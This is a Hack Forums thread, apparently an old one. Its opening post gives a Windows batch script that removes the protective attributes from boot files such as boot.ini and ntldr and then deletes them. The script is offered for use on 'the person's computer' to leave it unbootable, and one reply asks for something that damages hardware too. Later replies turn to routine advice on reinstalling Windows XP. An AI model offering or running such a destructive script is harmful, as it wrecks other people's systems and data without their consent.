Hack Forums

Full Version: How to Shut Down a Computer FOREVER
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2 3 4 5
Open up notepad and copy and paste that. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun!!!

REMEMBER - DO NOT RUN THIS FILE.

YOU WONT RECOVER YOUR PC BACK AFTER YOU OPEN THE .BAT FILE!

Code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
It does no hardware damage, so it's repairable. When you find something that makes bad sectors on the hard drive or damages something else then let me know
SS 'Kain Wrote:It does no hardware damage, so it's repairable. When you find something that makes bad sectors on the hard drive or damages something else then let me know

yeah it only does the software damage.

oh Hardware damage....i would love to have that one too!
Shirly do you know of a batch file that can pretty much clean my whole hard drive and make my computer look like its new again.
I'm sick of all this trial sh*t on my PC that I can't get rid of.
Tonka Wrote:Shirly do you know of a batch file that can pretty much clean my whole hard drive and make my computer look like its new again.
I'm sick of all this trial sh*t on my PC that I can't get rid of.
You don't need a batch file for that.
Just format it.
You use XP?
Yep I use XP.
But I would like to use a batch file because it isn't letting me reformat.
batch file won't help you either.
Open the winXP installation CD. It has it's own guide how to install XP(somth like readme). If you follow it, you won't have any problems with it.
And while installing xp, it will have the option to format the drive, so u don't have to do that manually.
Ok I will try that again.
I can't install XP again because it says the Windows on my PC is newer then the one thats on the disk and it wont let me continue.
Boot from your WIN XP CD ( Set CD Drive as the first boot device in BIOS ), boot from xp cd folow the instructions and when you reach a part when you can see your partitions delete partiton c: then create new partition and select to install XP on it and select ntfs quick format .If you can't format HDD and install OS from there that is often a sign of hardware malfunction ( usually it's HDD but it can also be anything else )
Pages: 1 2 3 4 5
Reference URL's